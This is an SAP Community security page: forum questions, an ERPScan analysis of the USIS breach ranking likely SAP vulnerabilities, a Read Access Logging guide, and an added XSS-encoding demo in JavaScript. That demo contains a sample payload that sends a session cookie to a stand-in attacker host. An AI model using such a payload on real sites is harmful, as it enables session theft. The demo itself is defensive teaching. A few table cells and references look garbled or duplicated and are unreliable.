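```javascript
// Added example, not code from the ERPScan report or from SAP: contextual
// output encoding against reflected XSS in a server-side JavaScript handler
// (the shape an SAP HANA XSJS service would have). The request object, the
// markup and the attack payload are constructed for this demonstration.

// Encode a value for the HTML text context and for double-quoted attribute
// values. Every character that can open a tag, an attribute or an entity is
// replaced, so the browser can only render the value as literal text.
function escapeHtml(value) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Vulnerable handler: the query parameter is concatenated straight into the
// response, so a crafted link runs script in the visitor's sap.com origin.
function renderSearchUnsafe(req) {
  const q = req.parameters.q;
  return '<h2>Results for ' + q + '</h2>' +
         '<input name="q" value="' + q + '">';
}

// Hardened handler: same markup, but the untrusted value is encoded for the
// two contexts it lands in (text node and double-quoted attribute). Unquoted
// attributes, JavaScript strings and URLs need different encoders; this
// function does not place data in any of those contexts.
function renderSearchSafe(req) {
  const q = escapeHtml(req.parameters.q);
  return '<h2>Results for ' + q + '</h2>' +
         '<input name="q" value="' + q + '">';
}

// Reviewer's smoke test over rendered output: a raw <script> tag, or an
// event-handler attribute inside a tag, means encoding was skipped somewhere.
function containsActiveMarkup(html) {
  return /<script\b|<[a-z][^>]*\bon[a-z]+\s*=/i.test(html);
}

// Constructed payload: the leading '">' closes value="..." and the <input>
// tag, then the script exfiltrates the session cookie to a hypothetical host.
const PAYLOAD =
  '"><script>new Image().src="https://attacker.example/c?"+document.cookie</script>';
const request = { parameters: { q: PAYLOAD } };

// Render both variants and report whether the payload survives as markup.
function demo() {
  return {
    unsafeExecutes: containsActiveMarkup(renderSearchUnsafe(request)),
    safeExecutes: containsActiveMarkup(renderSearchSafe(request)),
  };
}

const result = demo();
if (result.unsafeExecutes !== true || result.safeExecutes !== false) {
  throw new Error('encoding demonstration failed: ' + JSON.stringify(result));
}
```

The same rule applies on the other platforms the report covers: in ABAP the built-in `escape( val = ... format = cl_abap_format=>e_html_text )` (and `e_html_attr` for attribute values) is the equivalent of `escapeHtml` above, and in each case the encoder must match the context the value is written into rather than being applied once at input time.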

Content Server 6.5 + Windows Server 2012 putCert


After installing SAP Content Server 6.5 on Windows Server 2012, an attempt to execute the putCert query to import the certificate (X.509 v3, DSA or RSA) returns the error: "X-ErrorDescription: Security: CertToTBS failed in SsfLibVerify (empty signerlist)"

ME21N restriction by material types


Hi

 

We would like to restrict ME21N access by material type. I believe this is possible by turning on the authorisation check in SU24 for the ME21N transaction for authorisation object M_MATE_MAR, once the relevant material types are maintained through T-code OMS2.

 

Would these two changes suffice, or do we need to activate any BAdI in the ME21N transaction to enable this authorisation check? I am not sure if the M_MATE_MAR check is part of the standard authorisation checks in ME21N. Please advise.

 

Thanks & Regards

Dinesh N

Need to alert security team every time when a new authorization object is created


Hi,

 

There is a requirement that whenever a new authorization object is created in SU21, an alert or mail is sent to the security team. Is there any BAdI or exit available to write the code? Or is there any standard workflow task that could cover this requirement?

 

Thanks and Regards

Sudarshan Gaikwad

How to display users with their assigned roles and transaction codes


Good day,

 

I would like to list users with their roles and transaction codes. I do not find any option in SUIM that displays them on a single page where I can print them out easily. Is this possible?

 

Thanks!

Sap query


Hi All,

 

We have configured a few queries against the 'X' user ID, but unfortunately the access to SQVI for the 'X' user ID has been revoked.

So can anyone let me know if it is possible to see those queries and the configuration made against them?

 

Thanks in Advance!

 

Regards,

Ali


Mass Role Deletion


Hi experts..

 

Please help me: how can I delete a bunch of roles for a single user?

Removal of Developer Key


What is the process to request that SAP remove or deactivate a Developer Key from a specific user so that it is no longer valid or associated with that user? Any input would be most appreciated.

 

Thank you, Jane Landreth

Audit logs not displaying in sm20


Hi all,

 

After the kernel 721_EXT_500 upgrade, I am not able to see security audit logs in SM20. However, logs are being generated at OS level.

 

I have observed that after the kernel upgrade the audit file format at OS level changed to ++++++++######.AUD; before it was audit_+++++++. Accordingly I have set the parameters below:

 

FN_AUDIT      ++++++++######.AUD
DIR_AUDIT    /usr/sap/SID/DVEBMGS00/log
RSAU/ENABLE  1

 

After changing the FN_AUDIT parameter, I can see only the logs from after the kernel upgrade, but I want to see the full logs from before and after the kernel upgrade.

 

I appreciate your quick response.

 

Regards,

Raghav.


Featured Content in Security


Attack Detection Patterns of SAP Enterprise Threat Detection

Attack detection patterns are what powers the ability of SAP Enterprise Threat Detection to alert you to suspicious activity in your network. Read Michael Shea’s blog for an overview of the kind of patterns we deliver with our product. May 7, 2015

 

Join the SAP Enterprise Threat Detection Customer Engagement Initiative

Join our Customer Engagement Initiative for SAP Enterprise Threat Detection that helps you to detect cyberattacks against SAP systems and non-SAP systems in real-time. You will be able to influence product development and get early insight into upcoming innovations. Find out more and contact Carmen Graf to register. April 16, 2015

 

Join the SAP Cloud Identity Service Customer Engagement Initiative

Join our Customer Engagement Initiative (CEI) 2015 for SAP Cloud Identity service and influence our product development in collaboration with your peers! For more details go to the CEI “Enhance Functionality for SAP Cloud Identity Service” and contact Donka Dimitrova to register. March 13, 2015

In header of suim we are not getting description for transaction code in selection criteria


When we select "Users by Complex Selection Criteria" in the SUIM tcode for any transaction code like SU01 or FK04, in the header we are not getting the description for the transaction code in the selection criteria. Please check the attached screenshot for reference.

 

Please check and suggest ASAP what needs to be done to enable this, as it is required from an audit perspective.

 

Thanks in advance !

Chinese attack on USIS using SAP vulnerability – Detailed review and comments


On 11 May, a security headline broke in the news: an attack on USIS (U.S. Investigations Services), potentially conducted by Chinese state-sponsored hackers via a vulnerability in SAP software. Hackers broke into third-party software in 2013 to open personal records of federal employees and contractors with access to classified intelligence, according to the government's largest private employee investigation provider [1].

USIS is a federal contractor which conducts background checks for DHS and is the largest commercial provider of background investigations to the federal government. It has more than 5,700 employees providing services in all 50 states and U.S. territories and overseas. As a result of the breach, more than 27,000 personnel seeking security clearances were likely affected. Similar hacks also affected servers at the Office of Personnel Management (OPM), which holds information on security clearance investigations. Once hackers have a list of employees who possess government security clearances, they can exploit other aspects of those employees' lives for malicious gain.

Within a couple of hours after the information appeared that it was an SAP vulnerability, we contacted journalists at DarkReading and gave them feedback and comments.

Now we are sharing all the comments that were prepared, as well as additional research conducted by us, to tell you what the next steps can be for organizations to secure their systems and prevent such attacks.

Below you can find the timeline of the attack investigation, a collection of historical facts from different sources, and our comments on the topic.

 

Attack timeline

Late 2013

Initial attack against a USIS supplier potentially started [2].

 

March 2014

The attack continued against USIS [3].

Both USIS and OPM were hacked around March 2014, and while the security controls in place at OPM's networks shielded employee information, the networks at USIS were not as secure. At USIS, hackers deployed spyware designed to capture screenshots when a background check window was open,

- said Stroz Friedberg, the digital forensics firm.

Hackers infiltrated a network belonging to one of USIS’s suppliers that stored enterprise resource planning software. That network was connected to USIS’s network.

According to NextGov, “the attacker was able to navigate from the third-party-managed environment into the USIS network in late (redacted) by successfully brute-forcing a password on an application server,” - wrote Padres, referring to a hacking technique that systematically checks all possible passwords. “Once the attacker was able to log in to that server, the attacker installed a malicious backdoor.”

June 05 2014

USIS reported the cyberattack to federal authorities on June 5, more than two months before acknowledging it publicly [4].

July 09 2014

It was published that Chinese hackers in March broke into the computer networks of the United States government agency that houses the personal information of all federal employees. But officials also said that neither the personnel agency nor Homeland Security had identified any loss of personally identifiable information [5].

August 06 2014

USIS published a press release stating that they had been hacked and that it was potentially a state-sponsored attack. They also hired an independent forensic investigation company, Stroz Friedberg, to perform an investigation [6].

August 22 2014

Detailed information about the breach appeared in the news.

The agency has identified some 25,000 employees whose information it believes was exposed in the breach. While the number of employees affected is relatively small compared to breaches at retailers such as Target or Home Depot, which have affected tens of millions of customers, it is nonetheless quite serious,

– one of the DHS officials told Reuters.

Files on background checks contain highly sensitive data that foreign intelligence agencies could attempt to exploit to intimidate government workers with access to classified information.

This information includes Social Security numbers, education and criminal history, birth dates along with information about spouses, other relatives and friends including their names and addresses. [7]

November 03 2014

The first detailed information about the attack appeared on the Associated Press website, at this time without any detail that an attack on an SAP ERP system had been used to conduct the attack [8].

“A cyberattack similar to previous hacker intrusions from China penetrated computer networks for months at USIS, the government's leading security clearance contractor, before the company noticed, officials and others familiar with an FBI investigation and related official inquiries.

The breach, first revealed by the company and government agencies in August, compromised the private records of at least 25,000 employees at the Homeland Security Department and cost the company hundreds of millions of dollars in lost government contracts. In addition to trying to identify the perpetrators and evaluate the scale of the stolen material, the government inquiries have prompted concerns about why computer detection alarms inside the company failed to quickly notice the hackers and whether federal agencies that hired the company should have monitored its practices more closely,” – told The Associated Press [9].

In the private analysis prepared for USIS by Stroz Friedberg, a digital risk management firm, managing director Bret A. Padres said the company's computers had government-approved "perimeter protection, antivirus, user authentication and intrusion-detection technologies." But Padres said his firm did not evaluate the strength of USIS' cybersecurity measures before the intrusion.

So, what can we learn from the statement "government inquiries have prompted concerns about why computer detection alarms inside the company failed to quickly notice the hackers"?

As we have mentioned in many reports, SAP security, like any business application security area, is rarely covered by traditional security tools such as vulnerability management and intrusion detection systems. SAP has very specific vulnerabilities and configuration issues that should be assessed by high-quality experts. To give you an example, there are thousands of security-related parameters in each SAP system in the application server alone. In addition, 3300+ vulnerabilities were found in SAP from 2001 till 2015. And if we continue to speak about complexity, there are 1200 web services installed by default on SAP NetWeaver 7.2 (SAP's application server), and each web service is like a small website. So you can get an idea of the complexity of this system and how many issues can exist in it. Needless to say, "complexity kills security". Even after SAP's latest marketing campaign "SAP is Simple" (which is a great idea), it will take years to make it really simple with such an amount of legacy systems.

November 04 2014

New information appeared in the news [10].

The hackers attacked a vulnerable computer server in a connected but separate network, managed by a third party not affiliated with USIS,

- said Padres of the forensics company.

Now we learned that the actual attack was conducted via a separate network owned by a third party, but still nothing specific about how exactly it happened.

April 28 2015

After almost 5 months of silence, some new information finally appeared. This was the first source where we found information pointing to the fact that the initial attack was against an ERP system, and that this ERP system was on a separate network managed by a separate company [11].

Hackers infiltrated a network belonging to one of USIS’s suppliers, which stored enterprise resource planning software. That network was connected to USIS’s network. [12]

The attacker was able to navigate from the third-party-managed environment into the USIS network in late (redacted) by successfully brute-forcing a password on an application server,

– wrote Padres.

When we speak about business applications, we need to consider their highly interconnected nature. You can't just implement dozens of business applications in a company and leave them unconnected. For example, to automate business processes, your ERP system should be able to automatically create an invoice in the banking system, so these systems have to be connected at the application layer even if they are separated at the network level. In real life we see dozens or even hundreds of connections between different SAP systems, and some of these connections (so-called RFC destinations) store usernames and passwords (according to our statistics, the average number of connections in an SAP system is about 50, and about 30% of them store usernames and passwords).

Once an attacker gets access to the weakest SAP system, he can easily get access to the connected systems and from them to others, and so on, spreading his access like a spider's web.

Another way business applications can be connected is via an Enterprise Service Bus such as SAP PI (Process Integration); these systems also have vulnerabilities, as reported by the ERPScan Research team at the BlackHat 2013 conference.

Finally, even if direct connections don't exist, there is research conducted by the ERPScan Research team explaining an SSRF attack that can be used to bypass firewall restrictions and attack systems through their trust connections [13].

Taking those connections into account, it comes as no surprise that the attackers were able to get access to the connected network of another company.

Finally, we would like to say that those connections can be even more dangerous for Manufacturing, Oil and Gas and Nuclear companies, where SAP can be connected with field devices and the plant floor.

May 10 2015

From the previous article we could already conclude that this ERP system was most probably SAP, as the most popular one, and the new article confirmed this. NextGov became the first source to state that it was actually SAP.

“That software apparently was an SAP enterprise resource planning application. It’s unclear if there was a fix available for the program flaw at the time of the attack. It’s also not clear whether SAP—which was responsible for maintaining the application—or USIS would have been responsible for patching the flaw.

But in the end, sensitive details on tens of thousands of national security personnel were exposed in March 2014.

Assailants infiltrated USIS by piggybacking on an “exploit,” a glitch that can be abused by hackers, that was “present in a widely used and highly-regarded enterprise resource planning (‘ERP’) software package,” an internal investigation obtained by Nextgov found. USIS officials declined to explicitly name the software application, saying they would let the report, compiled by Stroz Friedberg, a digital forensics firm retained by USIS, speak for itself.” [14]

This report also includes an attempt to look deeper into SAP vulnerabilities and guess what happened:

During the period of the hacking operation, which began in 2013 and was exposed in June 2014, 20 to 30 new critical vulnerabilities were identified in SAP’s enterprise resource planning software [15].

From our point of view, the real figures for potential vulnerabilities are much larger. If we assume that the real attack was conducted in 2013, say at the beginning of the year, the actual number of vulnerabilities patched by SAP from 2001 to the middle of 2013 was about 2000, according to the research "SAP Security in figures 2013" [16], based on information from the SAP Support portal about all vulnerabilities.

"The number of SAP vulnerabilities would have given attackers many options to target SAP directly, based on how USIS deployed the ERP tool," - said Richard Barger, chief intelligence officer at ThreatConnect and former Army intelligence analyst.

This is more than true. In addition to the more than 2000 potential vulnerabilities in SAP applications, there can also be vulnerabilities in custom programs developed by the USIS subcontractor or even by another third party.

It is unclear which vulnerability the intruders exploited. Defects in programs used by the government and contractors sometimes aren’t fixed for years after software developers announce a weakness.

May 11 2015

Some other details appeared [17].

Lawmakers have been pressing for answers about the breach since last year. Suspected Chinese hackers got into the USIS systems in late 2013 but weren't discovered until June 2014. This does not surprise us at all. Some of the companies that we had a chance to assess don't have any visibility into their systems. According to our research, only 10% of customers really configure and analyze SAP security logs and other events.

May 12 2015

An article from DarkReading where we gave our first comments regarding this breach [18].

So now you can get the full picture of the attack, and there is only one question left: how was this attack conducted? Let's try to answer it.

What kind of vulnerability was exploited?

The news states that the vulnerability is "present in a widely-used and highly-regarded enterprise resource planning ('ERP') software package".

No other details about the vulnerability were provided.

Let's try to understand what kind of vulnerabilities were used in this attack, but first let's look at the history. We publish annual reviews of SAP vulnerabilities; these reports are usually called "SAP Security in figures":

  • 2011: SAP SECURITY IN FIGURES 2007-2011 [19]
  • 2013: SAP SECURITY IN FIGURES 2007-2011 [20]
  • 2014: Analysis of 3000 SAP Security Notes [21]
  • 2015: Blog post with the latest review [22]


From those reports we can get information about the most critical vulnerabilities. Taking into account that the attack happened in late 2013, only the first three reports are relevant for us. Another guideline provided by the ERPScan Research team focuses on the most popular vulnerabilities, taking their criticality into consideration as well. So, by combining data from these reports we can give an overview of the vulnerabilities that were most probably used in this attack. And even if this assumption turns out to be wrong, we will still get a list of the most critical and popular vulnerabilities affecting SAP ERP systems. The fact that we are mostly looking for SAP ERP vulnerabilities should also be taken into account.

We also excluded most of the vulnerabilities that can only be used in combination with others, most of the very specific vulnerabilities, and those vulnerabilities that require some user action, such as XSS. So finally we collected 15 vulnerabilities that were most likely used against the ERP system in this period of time and that give an attacker an easy way to get full access to a vulnerable SAP system. Finally, we limited the list of vulnerabilities by publication date and selected only those published before Q2 2013.

We assigned a couple of parameters to each vulnerability to calculate the final likelihood that this particular vulnerability was used:

  • Criticality – the real impact on the system, such as full administrative access or just an information disclosure.
  • Popularity – the amount of information in public sources such as presentations, whitepapers and advisories describing the vulnerability.
  • Ease of exploitation – whether there is a publicly available free tool with an exploit, or an exploit, a PoC, an advisory, or some kind of details.
  • Applicability – our personal opinion on whether this vulnerability is applicable to the particular system that was used in the organization.
  • Likelihood – the overall probability that this particular vulnerability was exploited, based on the previously mentioned parameters.

Below is the table with details of our analysis.

Vulnerability title                               | Year | Likelihood | Pop. | Crit. | Ease | Appl. | CVSSv2 | Patch (SAP Note)
Default passwords for administrative users        | ???? | 100.00%    | 5    | 5     | 5    | 5     | N/A    | 1414256
RFC Gateway remote command execution              | 2007 | 80.00%     | 5    | 5     | 4    | 5     | 7.5    | 1425765, 1408081, 1473017, 1069911, 1480644, 614971, 1525125
SAP/Oracle REMOTE_OS_AUTHENT                      | 2003 | 40.96%     | 4    | 4     | 4    | 4     | 7.5    | 1622837, 1639578
Remote code execution via TH_GREP                 | 2011 | 38.40%     | 4    | 5     | 3    | 4     | 6.0    | 1620632
Unauthorized access to SAP Management console     | 2011 | 38.40%     | 4    | 3     | 4    | 5     | 5.6    | 1439348
SAP Host Control – Code Injection                 | 2012 | 36.00%     | 3    | 5     | 5    | 3     | 10     | 1341333
SAP Dispatcher – DIAG protocol Buffer Overflow    | 2012 | 24.00%     | 3    | 5     | 2    | 5     | 9.3    | 1687910
Authentication bypass through Verb Tampering      | 2011 | 20.00%     | 5    | 5     | 5    | 1     | 10     | 1589525, 1624450
Authentication bypass through the Invoker servlet | 2011 | 20.00%     | 5    | 5     | 5    | 1     | 10     | 1585527
SAP Message Server – Buffer Overflow              | 2012 | 16.00%     | 2    | 5     | 2    | 5     | 10     | 1649840
SAP NetWeaver DI – Arbitrary file upload          | 2013 | 10.24%     | 2    | 4     | 2    | 4     | 9.3    | 10
Message Server Auth Bypass                        | 2008 | 7.68%      | 3    | 4     | 1    | 4     | 7.5    | 1421005
SAP GRMGApp – XXE and authentication bypass       | 2013 | 5.76%      | 2    | 3     | 2    | 3     | 7.3    | 1729293, 1725390
SAP NetWeaver J2EE – DilbertMSG SSRF              | 2012 | 4.32%      | 3    | 3     | 3    | 1     | 7.3    | 1707494
Buffer overflow in ABAP Kernel call               | 2011 | 3.20%      | 1    | 5     | 1    | 4     | 4.8    | 1487330, 1529807


So, most likely the vulnerability that was used was one of these:


  • Default passwords for administrative users
  • RFC Gateway remote command execution
  • SAP/Oracle REMOTE_OS_AUTHENT
  • Remote code execution via TH_GREP
  • Unauthorized access to SAP Management console
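The scoring behind the table above, as an added example that is not ERPScan's own code: the post never states the likelihood formula, but every published percentage equals the product of the four 1-5 scores divided by 5^4, so that model is assumed here. The block transcribes the table, checks the transcription against the published percentages, re-derives the ranking and turns it into a prioritised list of the SAP Notes a defender would apply first.

```python
"""Likelihood model for the ERPScan USIS vulnerability table.

Added example; the formula (product of the four scores / 5**4) is an
assumption inferred from the published percentages, not stated by the author.
Rows are transcribed from the table on the page.
"""
from dataclasses import dataclass

MAX_SCORE = 5  # every parameter in the table is scored 1..5


@dataclass(frozen=True)
class VulnRow:
    title: str
    year: str
    published_pct: float      # likelihood as printed in the table
    popularity: int
    criticality: int
    ease: int                 # ease of exploitation
    applicability: int
    cvss: str
    notes: tuple              # SAP Security Note numbers from the Patch column


def likelihood(popularity, criticality, ease, applicability):
    """Assumed model: product of the four 1..5 scores, normalised to 0..100 %."""
    for score in (popularity, criticality, ease, applicability):
        if not 1 <= score <= MAX_SCORE:
            raise ValueError(f"score {score} outside 1..{MAX_SCORE}")
    return 100.0 * popularity * criticality * ease * applicability / MAX_SCORE ** 4


# Transcribed from the table (title, year, likelihood, pop, crit, ease, appl, CVSSv2, notes).
TABLE = (
    VulnRow("Default passwords for administrative users", "????", 100.00, 5, 5, 5, 5, "N/A", (1414256,)),
    VulnRow("RFC Gateway remote command execution", "2007", 80.00, 5, 5, 4, 5, "7.5",
            (1425765, 1408081, 1473017, 1069911, 1480644, 614971, 1525125)),
    VulnRow("SAP/Oracle REMOTE_OS_AUTHENT", "2003", 40.96, 4, 4, 4, 4, "7.5", (1622837, 1639578)),
    VulnRow("Remote code execution via TH_GREP", "2011", 38.40, 4, 5, 3, 4, "6.0", (1620632,)),
    VulnRow("Unauthorized access to SAP Management console", "2011", 38.40, 4, 3, 4, 5, "5.6", (1439348,)),
    VulnRow("SAP Host Control - Code Injection", "2012", 36.00, 3, 5, 5, 3, "10", (1341333,)),
    VulnRow("SAP Dispatcher - DIAG protocol Buffer Overflow", "2012", 24.00, 3, 5, 2, 5, "9.3", (1687910,)),
    VulnRow("Authentication bypass through Verb Tampering", "2011", 20.00, 5, 5, 5, 1, "10", (1589525, 1624450)),
    VulnRow("Authentication bypass through the Invoker servlet", "2011", 20.00, 5, 5, 5, 1, "10", (1585527,)),
    VulnRow("SAP Message Server - Buffer Overflow", "2012", 16.00, 2, 5, 2, 5, "10", (1649840,)),
    # The Patch column of this row is garbled on the page, so no Note number is transcribed.
    VulnRow("SAP NetWeaver DI - Arbitrary file upload", "2013", 10.24, 2, 4, 2, 4, "9.3", ()),
    VulnRow("Message Server Auth Bypass", "2008", 7.68, 3, 4, 1, 4, "7.5", (1421005,)),
    VulnRow("SAP GRMGApp - XXE and authentication bypass", "2013", 5.76, 2, 3, 2, 3, "7.3", (1729293, 1725390)),
    VulnRow("SAP NetWeaver J2EE - DilbertMSG SSRF", "2012", 4.32, 3, 3, 3, 1, "7.3", (1707494,)),
    VulnRow("Buffer overflow in ABAP Kernel call", "2011", 3.20, 1, 5, 1, 4, "4.8", (1487330, 1529807)),
)


def row_likelihood(row):
    return likelihood(row.popularity, row.criticality, row.ease, row.applicability)


def transcription_mismatches(rows=TABLE, tolerance=0.005):
    """Titles whose computed likelihood differs from the printed one (empty = model fits)."""
    return [r.title for r in rows if abs(row_likelihood(r) - r.published_pct) > tolerance]


def ranked(rows=TABLE):
    """(title, likelihood) pairs, highest first; ties keep the table's order."""
    pairs = [(r.title, row_likelihood(r)) for r in rows]
    return sorted(pairs, key=lambda p: -p[1])


def notes_to_apply(rows=TABLE, threshold=38.0):
    """Sorted, de-duplicated SAP Notes for every row scoring at or above the threshold."""
    notes = {n for r in rows if row_likelihood(r) >= threshold for n in r.notes}
    return tuple(sorted(notes))


if __name__ == "__main__":
    print("mismatches:", transcription_mismatches())
    for title, pct in ranked():
        print(f"{pct:6.2f}%  {title}")
    print("notes first:", notes_to_apply())
```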


Prevention


First, we recommend implementing the most critical SAP Security Notes, those for the vulnerabilities that were probably used during this attack, listed in the table in the previous chapter. Secondly, follow our guideline [23] for an initial assessment of the SAP NetWeaver ABAP application server, the 33 most critical security checks. Thirdly, check this presentation, as well as all other slides and guidelines [24] about SAP security; you are also welcome to follow us at security conferences worldwide. Here is the list of the nearest events.


Recommendations


Since all the steps discussed previously require a lot of manpower, we recommend that you check automated solutions to assess and secure your system as soon as possible, as nobody knows whether your system is not already under attack.


Takeaways for CISOs are:


As you see, when researchers start flagging security loopholes by publishing information about one or another system's vulnerability, it's only a matter of time before cyber criminals actually exploit it. Who will fall victim is anybody's guess. So, apart from the fact that it's better to take precautionary actions before a real example surfaces (we started talking about this 8 years ago), our lessons are simply three:

  • You can't rely only on traditional security solutions when we speak about advanced cyber attacks.
  • You can't be sure that everything is OK in your network unless you really monitor it from all angles; for SAP this means that VA, custom code security, SoD and event monitoring should all be on the radar.
  • And most important for business applications: they are highly connected with each other, as you see in this example, so it's not only a problem of your infrastructure security but also a problem of all your external connections and third-party security.


So what it boils down to is that "a system is only as secure as its weakest link".

References

1. http://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/

2. http://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/

3. http://www.homelandsecuritynewswire.com/dr20150430-breach-of-backgroundchecks-database-may-lead-to-blackmail

4. http://www.theblaze.com/stories/2014/11/04/cyberattack-on-top-u-s-govt-security-contractor-went-unnoticed-for-months/

5. http://www.nytimes.com/2014/07/10/world/asia/chinese-hackers-pursue-key-data-on-us-workers.html?_r=0

6. http://www.usis.com/media-release-detail.aspx?dpid=151

7. http://www.reuters.com/article/2014/08/22/us-usa-security-contractor-cyberattack-idUSKBN0GM1TZ20140822

8. http://bigstory.ap.org/article/427fbd5d88f5481eab35f5a8bbc534be/security-contractor-breach-not-detected-months

9. http://bigstory.ap.org/article/427fbd5d88f5481eab35f5a8bbc534be/security-contractor-breach-not-detected-months

10. http://www.theblaze.com/stories/2014/11/04/cyberattack-on-top-u-s-govt-security-contractor-went-unnoticed-for-months/

11. http://www.ladailypost.com/content/background-checks-database-breach-heightens-blackmail-risk

12. http://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/

13. http://erpscan.com/wp-content/themes/supercms/Publications/SSRF%20vs%20Businness%20critical%20applications%20final%20edit.pdf

14. http://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/

15. http://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/

16. http://erpscan.com/wp-content/themes/supercms/Publications/SAP%20Security%20in%20figures%20-%20A%20global%20survey%202013%20RC.pdf

17. http://thehill.com/policy/cybersecurity/241588-report-hackers-infiltrated-security-contractor-using-third-party

18. http://www.darkreading.com/attacks-breaches/first-example-of-sap-breach-surfaces/d/d-id/1320382

19. http://erpscan.com/wp-content/themes/supercms/Publications/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdf

20. http://erpscan.com/wp-content/themes/supercms/Publications/3000-SAP-notes-Analysis-by-ERPScan.pdf

21. http://erpscan.com/wp-content/themes/supercms/Publications/3000-SAP-notes-Analysis-by-ERPScan.pdf

22. http://erpscan.com/press-center/blog/sap-vulnerabilities-highlighted-in-many-reports-such-as-hp-cyber-risk-report-2015/#more-7858

23. http://erpscan.com/wp-content/themes/supercms/Publications/EASSEC-PVAG-ABAP.pdf

24. http://erpscan.com/white-papers/

Replication or remote RAL logs


Hello experts,

 

We are switching from Seclog to RAL (after an upgrade).

 

In this context our customer has asked us if it is possible to replicate the RAL logs to a remote site, so an internal hacker isn't able to clear his tracks by deleting RAL logs, e.g. at OS level.

 

They want us to replicate to a customer secure site.

 

Is this supported directly in RAL or do we have to make a manual DB replication of relevant tables?

 

Cheers,

Kenneth


Read Access Logging - Dynpro Configuration Step-by-Step guide


Introduction:

Read Access Logging is one of the powerful tools for securing data. With the help of this SAP out-of-the-box solution, you can monitor data that is being accessed via the SAP Dynpro, Web Dynpro, RFC and Web service channels.


In this document, I would like to share a step-by-step guide to configuring a Dynpro application. Please check SAP Note 1969086 for release information on Read Access Logging. You need specific roles to configure the application.

 

Steps to configure Dynpro application:

1. Access the Read Access Logging screen with transaction code SRALMANAGER

     1.png


2. Click on "Logging Purposes"

Note: A logging purpose is a way to classify each log entry, for example "Privacy" or "Finance records".

    

3. Click on "Create"

4. Enter the data and click on "Create" to close the pop-up

3.png

5. You can see the new purpose in the "Purposes" screen. You can delete it or change its name and description.

     Note: You may want to re-use an existing purpose for your configuration.

     4.png     

6. Return to the home screen and click on "Log Domains"

     5.png

 

7. Click on "Create"

     Note: This is where you define the semantic identification of the data, before the actual fields and rules are defined

 

8. Enter data in the fields below and click on "Create" to close the pop-up

     6.png    

9. You will see the newly created domain in the "Log Domains" screen

     7.png

10. Come back to the home screen.

 

11. If you want to configure Read Access Logging for SAP GUI screens or Web Dynpro screens, you must record the fields of those screens before the actual configuration. To do that, click on "Recordings"

     Note: This step is not required for the RFC or Web service channel.

     8.png

 

12. Click on "Create" to start a new recording.


13. Select the "Channel" from the drop-down and enter a name for the recording as shown below.

     9.png

14. Click on "Create" to close the pop-up. As you can see in the "State" column, recording is now active for the system (all SAP GUI transactions/screens)

     10.png

15. Go to the application (SAP Dynpro) for which you want to enable Read Access Logging. In this guide, we configure RAL for a small application that shows salary/PII data for a given employee ID.

 

16. Input screen: Ctrl+right-click on the input field to record the field.

      11.png

 

17. Output screen: Ctrl+right-click on each field that you want to record.

     12.png

 

18. You can use the "Remove field from Recording" option to remove a field from the recording.

Note: You need not press "Ctrl" for table columns. Also, no additional configuration or development is required to get the "Record Field" option in the context menu.

 

19. Go back to SRALMANAGER or the "Recordings" screen of Read Access Logging and turn off "Recording" by clicking on the "stop" icon (the state changes to "Finished")

13.png

 

20. You can click on the start icon to start recording once again.

 

21. Click on "Open Recording" or the corresponding icon. You will notice that all the fields you recorded are now available here along with their technical paths.

      14.png

 

22. Return to the home screen and click on "Configuration"

     16.png

23. Select "Dynpro" in the channel drop-down

     18.png

 

24. Click on "Create" to create a new configuration. Select the recording that you created and click on "Create" to close the pop-up

      19.png

 

25. You will see a screen like the one below

     20.png

 

25.1. Log Context:

The log context is the UI element on which the other UI elements within the logging session depend.

SAP help link for more details:

https://help.sap.com/saphelp_nw74/helpdata/en/fd/4d2551b7dd2314e10000000a44176d/content.htm

 

25.2. Log Groups:

The list of fields for which you want to enable Read Access Logging

 

25.3. Conditions:

You can apply conditions to read logging, e.g. exclude user ABCUSER from logging

 

25.4. Field List:

The list of fields that you recorded (or the list of interface parameters in the case of RFC or Web service), messages, OK codes and the system fields for user name, screen title and transaction code

 

26. Create a new context by clicking on the "create" icon

 

27. Enter the details below and click on "create" to close the pop-up

      22.png

28. Drag and drop the fields from the "Field List" to the Log Context

     23.png

Select "Input" from the drop-down (or whichever is appropriate for your application)

     24.png

 

29. Click on "Save as Inactive"

 

30. Click on "create" under the Log Groups section to create a new log group

     

31. Enter the data below and select the log purpose that you created (or an existing one). Click on "create" to close the pop-up.

      27.png

 

32. Drag and drop the fields that you want to log. You can do this for all the fields that you recorded and for the system fields.
Note: You need not log here the fields that were added to the Log Context.

      28.png

As shown above, you can select "Without Value" if you don't want to log the data that was accessed.
Set the field type based on the application UI field.
Choose the correct Log Domain.
"Exclude if initial": the field is not logged if its value is initial, to save space in the database.

 

33. Click on the "Save as active" button

     29.png

 

34. Now click on the "create" button under the "Conditions" section

  

35. Enter the data below and click on "create" to close

      31.png

 

36. Click on the "create" button under "Expressions". Enter a name and click on "create"

  

37. Drag and drop the fields from the "Field List" and create the condition

     33.png

38. After creating one or more conditions based on the fields available in the field list, you can "Save and Activate" the whole configuration

 

39. Go to the “Monitor” tab and click the “Read Access Log” link

     35.png

 

40. Select ‘Raw Database’ from the data source dropdown. Select 'Expanded database' when you want to access logs from other systems or clients (this requires additional configuration).

      36.png

 

41. You can use the flexible search criteria, which can be stored with the ‘save’ option, to find your log entries

      37.png

 

42. You will see the logs under ‘Search Result’

  

43. Select one of the log entries to see the logged data in detail

      39.png
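To make the effect of the three settings configured above (a condition that excludes a user, log-group fields logged with or without their value, and “Exclude if initial”) concrete, here is a small Python model of what ends up in the log for a given screen access. This is an added illustration, not SAP code and not the configuration from this post: the field names (KUNNR, NAME1, BANKN, TELF1), the transaction code, the users and the sample accesses are all constructed for the example.

```python
"""Model of how Read Access Logging (RAL) settings shape what is written.

Added illustration in plain Python, not SAP code. Field names, users,
transaction code and the sample accesses below are constructed.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class LogGroupField:
    name: str
    with_value: bool = True           # False corresponds to "Without Value"
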